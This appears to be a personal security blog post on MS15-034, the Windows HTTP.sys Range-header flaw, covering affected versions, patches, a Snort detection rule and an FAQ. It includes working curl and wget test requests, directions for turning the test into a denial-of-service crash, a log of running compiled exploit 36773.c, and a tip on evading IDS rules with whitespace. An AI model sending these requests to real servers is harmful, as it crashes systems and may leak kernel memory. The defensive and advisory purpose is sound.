Search
  • Leon Teale

MS15-034: Vulnerability in HTTP.sys Could Allow Remote Code Execution



Description

The version of Windows running on the remote host is affected a vulnerability in the HTTP protocol stack (HTTP.sys) due to improperly parsing crafted HTTP requests. A remote attacker can exploit this to execute arbitrary code with System privileges.

Solution

Microsoft has released a set of patches for Windows 7, 2008 R2, 8, 8.1, 2012, and 2012 R2

See Also

https://technet.microsoft.com/en-us/library/security/MS15-034


This Microsoft vulnerability MS15-034 can affect Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012, Windows 8.1, and Windows Server 2012 R2., running HTTP.sys which is used by any version of IIS running on one of these operating systems. HTTP.sys was introduced with IIS 6.


This vulnerability is in the HTTP protocol stack (HTTP.sys) due to improperly parsing crafted HTTP requests. A remote attacker can exploit this to execute arbitrary code with System privileges, alternatively, and most frequently executed, is a Denial of Service (DoS) due to the inherent improper parsing.



For example, to test for vulnerability there exists exploit code or a simple curl request can also provide information


curl -v 254.254.254.254/ -H "Host: test" -H "Range: bytes=0-18446744073709551615"

In the example Proof of Concept (PoC) above, change the "0-" to "20-". (It to be smaller than the size of the file retrieved, but larger then 0) and this will trigger a DoS, effectively shutting down the target host.


Microsoft have released information into this vulnerability, https://technet.microsoft.com/en-us/library/security/MS15-034


In doing some research, an IPS may protect you if you have the right rules installed. For example, here is a simple rule for Snort:

alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg: " MS15-034 Range Header HTTP.sys Exploit"; content: "|0d 0a|Range: bytes="; nocase; content: "-"; within: 20 ; byte_test: 10,>,1000000000,0,relative,string,dec ; sid: 1001239;) (byte_test is limited to 10 bytes, so I just check if the first 10 bytes are larger then 1000000000)

However,  there are some tricks to bypass simple rules, like adding whitespace to the Range: header's value.


Simple IIS filtering will not protect against this as IIS request filtering happens after the Range header is parsed.


Manual Checking

root@kali:~/Desktop/Tools/ms15-034# gcc 36773.c
root@kali:~/Desktop/Tools/ms15-034# ls 36773.c a.out
root@kali:~/Desktop/Tools/ms15-034# file a.out a.out: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.26, BuildID[sha1]=0xe84f917d3d5c67e5332ecb7b49a8a9614e5df588, not stripped
root@kali:~/Desktop/Tools/ms15-034# ./a.out  Usage: ./a.out <ip of server>
root@kali:~/Desktop/Tools/ms15-034# ./a.out 254.254.254.254 [*] Audit Started [!!] Looks VULN

FAQ

1 - Which Versions of Windows Are Vulnerable?

Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012, Windows 8.1, and Windows Server 2012 R2. HTTP.sys is used by any version of IIS running on one of these operating systems. HTTP.sys was introduced with IIS 6.


2 - Will an IPS protect me? 

Yes. If you have the right rules installed. For example, here is a simple rule for Snort:


alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg: " MS15-034 Range Header HTTP.sys Exploit"; content: "|0d 0a|Range: bytes="; nocase; content: "-"; within: 20 ; byte_test: 10,>,1000000000,0,relative,string,dec ; sid: 1001239;)

(byte_test is limited to 10 bytes, so I just check if the first 10 bytes are larger then 1000000000)


Watch out, there are some tricks to bypass simple rules, like adding whitespace to the Range: header's value. More info here.


3 - Will the exploit work over SSL?

Yes. Which may be used to bypass your IDS or other network protections


4 - Have you seen active exploits "in the wild"?

Not yet. We have seen working DoS exploits, but have not detected them in our honeypots. Erratasec conducted a (partial) scan of the Internet using a non-DoS exploit with the intend to enumerate vulnerable systems.


5 - How do I know if I am vulnerable?

Send the following request to your IIS server:

GET / HTTP/1.1 Host: MS15034 Range: bytes=0-18446744073709551615 If the server responds with "Requested Header Range Not Satisfiable", then you may be vulnerable.

Test Scripts:

(powershell removed as it doesn't support 64 bit intergers... worked without error for me, but something else may have been wrong with it)

curl -v [ipaddress]/ -H "Host: test" -H "Range: bytes=0-18446744073709551615"
wget -O /dev/null --header="Range: 0-18446744073709551615" http://ip

6 - Can this vulnerability be exploited to do more then a DoS?

In it's advisory, Microsoft considered the vulnerability as a remote code execution vulnerability. But at this point, no exploit has been made public that executed code. Only DoS exploits are available.


There also appears to be an information disclosure vulnerability. If the lower end of the range is one byte less then the size of the retrieved file, kernel memory is appended to the output before the system reboots. In my own testing, I was not able to achieve consistent information leakage. Most of the time, the server just crashes.


[Turns out, the file does not have to be > 4GB. Tried it with a short file and it worked. The >4GB information came from a bad interpretation of mine of the chinese article in the "Resources" section]


7 - How to I launch the DoS exploit?

In the example PoC above, change the "0-" to "20-". (has to be smaller then the size of the file retrieved, but larger then 0)


8 - What is special about the large number in the PoC exploit?

It is 2^64-1. The largest 64 bit number (hex: 0xFFFFFFFFFFFFFFFF)


9 - Any Other Workarounds?

In IIS 7, you can disable kernel caching.


10 - Is only IIS vulnerable? Or are other components affected as well?

Potentially, anything using HTTP.sys and kernel caching is vulnerable. HTTP.sys is the Windows library used to parse HTTP requests. However, IIS is the most common program exposing HTTP.sys. You may find potentially vulnerable components by typing: netsh http show servicestate (thx to @Gmanfunky)


11 - Will IIS Request Filtering Protect Me?

No. IIS Request Filtering happens after the Range header is parsed.

References:

https://ma.ttias.be/remote-code-execution-via-http-request-in-iis-on-windows/

https://technet.microsoft.com/library/security/MS15-034

https://support.microsoft.com/en-us/kb/3042553

http://blogs.360.cn/blog/cve_2015_6135_http_rce_analysis

20 views

© 2018 by Leon Teale

  • Facebook - Grey Circle
  • Twitter - Grey Circle
  • Google+ - Grey Circle
  • LinkedIn - Grey Circle
This site was designed with the
.com
website builder. Create your website today.
Start Now